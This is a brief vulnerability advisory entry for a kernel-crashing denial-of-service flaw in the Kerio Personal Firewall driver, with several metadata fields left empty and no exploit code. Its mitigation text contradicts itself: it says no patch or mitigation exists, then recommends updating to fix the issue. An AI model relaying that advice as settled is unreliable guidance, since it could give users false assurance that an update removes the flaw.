vendor: Kerio Personal Firewall
by:
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 20
Product Name: Kerio Personal Firewall
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Windows
Kerio Personal Firewall Denial of Service Vulnerability
The Kerio Personal Firewall (KPF) driver does not properly sanitize API parameters, leading to a denial of service vulnerability. When the KPF API hook handles certain parameter data, an exception is triggered that crashes the Windows kernel, resulting in a system-wide denial of service. An attacker can exploit this vulnerability to disrupt services and deny access to legitimate users.
Mitigation:
The vendor has not provided a specific mitigation for this vulnerability. It is recommended to update to the latest version of Kerio Personal Firewall to address this issue.